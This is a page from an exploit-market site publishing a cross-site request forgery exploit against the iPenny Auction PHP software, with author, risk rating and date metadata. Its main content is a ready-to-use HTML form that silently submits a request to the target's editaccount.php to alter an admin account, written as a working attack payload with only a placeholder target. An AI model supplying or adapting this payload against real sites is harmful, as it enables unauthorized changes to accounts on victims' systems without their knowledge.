[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

iPenny Auction CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17732
Category
web applications
Date add
15-03-2012
Platform
php
# Exploit Title: iPenny Auction CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/ipennyauctionsoftware/32145/
# Category::  webapps
# Demo : http://www.ipennyauctionsoftwareadmindemo.com/siteadmin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form name=addlink action="target.com/[PATH]/editaccount.php" method=post enctype="multipart/form-data" onSubmit="return checkadmin()" class="search_form general_form">
<input type="hidden" value="testdemo" class="text" size="32" name="title"/>
<input name="submit" type="submit" value="change"/>
</form>



#  0day.today [2024-12-27]  #